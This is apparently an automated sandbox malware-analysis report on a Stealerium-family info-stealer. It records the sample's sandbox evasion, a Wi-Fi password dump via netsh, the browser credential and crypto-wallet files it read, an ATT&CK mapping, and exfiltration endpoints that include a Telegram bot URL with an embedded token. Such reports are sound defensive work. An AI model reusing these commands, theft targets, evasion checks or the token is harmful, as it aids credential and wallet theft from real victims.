                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98969s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98859s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98724s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98578s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98440s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98312s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98203s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -98094s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -97984s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -595773s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -595666s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -595540s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -595406s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99807s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99683s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99573s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99464s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 100000
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99872
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99765
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99656
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99547
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99422
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99312
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99203
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99094
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98969
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98859
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98724
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98578
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98440
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98312
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98203
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 98094
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 97984
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99807
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99683
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99573
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 99464
                            Source: Amcache.hve.13.dr Binary or memory string: VMware
                            Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
                            Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
                            Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
                            Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
                            Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                            Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware svga 3d
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Info.txt.0.dr Binary or memory string: VirtualMachine: False
                            Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                            Source: K6aOw2Jmji.exe Binary or memory string: VirtualMachine:
                            Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E9780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780099000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA 3D
                            Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780099000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Video
                            Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
                            Source: K6aOw2Jmji.exe Binary or memory string: vmicshutdown
                            Source: K6aOw2Jmji.exe Binary or memory string: vmware
                            Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
                            Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
                            Source: K6aOw2Jmji.exe Binary or memory string: vmicvss
                            Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                            Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
                            Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                            Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                            Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                            Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                            Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
                            Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
                            Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
                            Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                            Source: K6aOw2Jmji.exe Binary or memory string: vmicheartbeat
                            Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: K6aOw2Jmji.exe, Decryptor.cs Reference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
                            Source: K6aOw2Jmji.exe, Decryptor.cs Reference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
                            Source: K6aOw2Jmji.exe, Keylogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid

                            Language, Device and Operating System Detection

                            Source: Yara match File source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Queries volume information: C:\Users\user\Desktop\K6aOw2Jmji.exe VolumeInformation
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                            Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
                            Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163823650.00000267E9EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match File source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: Yara match File source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, type: DROPPED
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &C:\Users\user\AppData\Roaming\Binance2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum\keystore
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: Yara match; File source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara match; File source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match; File source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR

                            Remote Access Functionality

                            Source: Yara match; File source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara match; File source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match; File source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: Yara match; File source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, type: DROPPED
                            Source: Yara match; File source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                            Execution: 131 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                            Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                            Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                            Defense Evasion: 11 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 251 Virtualization/Sandbox Evasion; 11 Process Injection
                            Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                            Discovery: 124 System Information Discovery; 1 Query Registry; 241 Security Software Discovery; 1 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery
                            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                            Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Screen Capture; 1 Email Collection; 1 Input Capture; 1 Clipboard Data; Web Portal Capture; Credential API Hooking
                            Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                            Impact: 1 Data Encrypted for Impact; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                            Behavior Graph ID: 1565209, Sample: K6aOw2Jmji.exe, Start date: 29/11/2024, Architecture: WINDOWS, Score: 100

                            Source | Detection | Scanner | Label | Link
                            K6aOw2Jmji.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                            K6aOw2Jmji.exe | 100% | Avira | TR/AVI.Stealerium.sbcde |
                            K6aOw2Jmji.exe | 100% | Joe Sandbox ML | |
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            raw.githubusercontent.com | 185.199.108.133 | true | false | | high
                            api.telegram.org | 149.154.167.220 | true | false | | high
                            api.gofile.io | 45.112.123.126 | true | false | | high
                            store5.gofile.io | 31.14.70.244 | true | false | | high
                            icanhazip.com | 104.16.185.241 | true | false | | high
                            54.229.13.0.in-addr.arpa | unknown | unknown | true | | unknown
                            Name | Malicious | Antivirus Detection | Reputation
                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt | false | | high
                            https://szurubooru.zulipchat.com/api/v1/messages | false | | high
                            https://api.gofile.io/servers | false | | high
                            https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe | false | | high
                            http://icanhazip.com/ | false | | high
                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt | false | | high
                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt | false | | high
                            https://store5.gofile.io/uploadfile | false | | high
                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt | false | | high
                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt | false | | high
                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt | false | | high
                            IP | Domain | Country | ASN | ASN Name | Malicious
                            149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
                            185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
                            104.16.185.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
                            45.112.123.126 | api.gofile.io | Singapore | 16509 | AMAZON-02US | false
                            31.14.70.244 | store5.gofile.io | Virgin Islands (BRITISH) | 199483 | LINKER-ASFR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565209
Start date and time: 2024-11-29 12:27:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: K6aOw2Jmji.exe (renamed because original name is a hash value)
Original Sample Name: 09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@19/85@7/5
EGA Information: Failed
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 302
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target K6aOw2Jmji.exe, PID 6400 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: K6aOw2Jmji.exe
Time | Type | Description
06:28:25 | API Interceptor | 123x Sleep call for process: K6aOw2Jmji.exe modified
06:29:12 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            • 172.64.41.3
                                                                                                                                                            9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            rkGw58sHF5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            Vr39ff92jh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 104.16.184.241
                                                                                                                                                            https://docs.zoom.us/doc/nOwDrP_BRFeNjNel8fAbXgGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.18.95.41
                                                                                                                                                            LBswoftSFF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            3lpDhNtVKt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            FASTLYUSTXj1ICMUqd.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.109.133
                                                                                                                                                            0b3SUiWz3y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.110.133
                                                                                                                                                            qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.111.133
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.110.133
                                                                                                                                                            051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            rkGw58sHF5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Vr39ff92jh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eTXj1ICMUqd.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            https://aysesuretobea.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
